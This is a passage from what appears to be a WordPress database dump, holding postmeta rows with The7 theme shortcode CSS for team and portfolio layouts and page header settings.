15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(24048,3554,'the7_shortcodes_dynamic_css','a:1:{s:32:\"9630b021c095e0b5fd3fc53eab26dccd\";s:6838:\".dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media {\n  padding: 15px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media img {\n  max-width: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .dt-css-grid .team-media img {\n  width: 100px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(24049,3554,'the7_shortcodes_dynamic_css','a:1:{s:32:\"9630b021c095e0b5fd3fc53eab26dccd\";s:6838:\".dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media {\n  padding: 15px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media img {\n  max-width: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .dt-css-grid .team-media img {\n  width: 100px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-9630b021c095e0b5fd3fc53eab26dccd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";}'),
(24050,3554,'_wp_page_template','default'),
(24051,3554,'_wpb_vc_js_status','true'),
(24052,3554,'_dt_sidebar_position','disabled'),
(24053,3554,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24054,3554,'_dt_sidebar_hide_on_mobile','0'),
(24055,3554,'_dt_footer_show','0'),
(24056,3554,'_dt_footer_widgetarea_id','sidebar_2'),
(24057,3554,'_dt_footer_hide_on_mobile','0'),
(24058,3554,'_dt_header_title','fancy'),
(24059,3554,'_dt_header_background','normal'),
(24060,3554,'_dt_header_background_below_slideshow','disabled'),
(24061,3554,'_dt_header_transparent_bg_color','#000000'),
(24062,3554,'_dt_header_transparent_bg_opacity','50'),
(24063,3554,'_dt_header_transparent_bg_color_scheme','light'),
(24064,3554,'_dt_header_disabled_background','normal'),
(24065,3554,'_dt_header_disabled_transparent_bg_color','#000000'),
(24066,3554,'_dt_header_disabled_transparent_bg_opacity','50'),
(24067,3554,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24068,3554,'_dt_header_transparent_top_bar_bg_color',''),
(24069,3554,'_dt_header_transparent_top_bar_bg_opacity','0'),
(24070,3554,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(24071,3554,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(24072,3554,'_dt_page_overrides_top_margin',''),
(24073,3554,'_dt_page_overrides_bottom_margin',''),
(24074,3554,'the7_shortcodes_inline_css','.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.classic-layout-list article {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article {\r\n  margin-top: ;\r\n  padding-top: 0;\r\n  border-color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on.classic-layout-list article:first-of-type {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-thumbnail-wrap {\r\n  width: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .post-entry-content {\r\n  width: calc(100% - );\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.classic-layout-list.mode-list .no-img .post-entry-content {\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list .post-entry-content {\r\n  margin-top: -100px;\r\n  width: 75%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\r\n  margin-top: 0;\r\n  width: 100%;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\r\n  margin-top: 0;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content {\r\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\r\n  background: #f7f7f7;\r\n  padding: 30px 30px 30px 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\r\n  display: none;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  background: #f7f7f7;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\r\n  top: 20px;\r\n  right: 20px;\r\n  bottom: 20px;\r\n  left: 20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-head-wrapper,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-wrapper {\r\n  right: 30px;\r\n  left: 30px;\r\n}\r\n#page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content {\r\n  background: none;\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list .post-entry-wrapper {\r\n  bottom: -15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\r\n  bottom: -5px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\r\n  bottom: -20px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\r\n  bottom: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator 